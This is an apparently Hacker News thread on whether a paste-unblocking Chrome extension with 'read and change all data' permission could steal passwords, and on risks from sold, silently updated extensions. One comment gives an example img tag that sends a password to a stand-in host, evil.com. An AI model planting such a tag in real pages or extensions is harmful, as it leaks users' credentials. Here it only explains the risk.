Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

I was overjoyed by this, and then i saw the permissions: "it can read and change all data on websites you visit".

I _think_ that means it can send all of by passwords offsite, or do plugins need a separate permission to phone home?

https://security.stackexchange.com/questions/15259/worst-cas...



Even if the plugin couldn't phone home directly, if they have the power to change the HTML of the page, they can insert <img src="http://evil.com/phonehome?yourpassword=whatever"> and phone home that way. There's no permission that lets a plugin modify pages while preventing it from inserting tags that cause new requests.

The plugin's code is probably quite short - maybe you could inspect it yourself, manually?


Problem is extensions silently update in the background. They are frequently sold to adware companies, then malicious scripts added in without the user's knowledge.


Hadn't done this before, but it's trivial to manually load the plugin[1] from the cloned git repo[2].

It's a bit disappointing that Chrome doesn't let you sandbox things well enough to install plugins safely; there's no reason that plugins should be allowed to transmit data without asking for permission.

[1]: https://developer.chrome.com/extensions/getstarted [2]: https://github.com/jswanner/DontFuckWithPaste




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: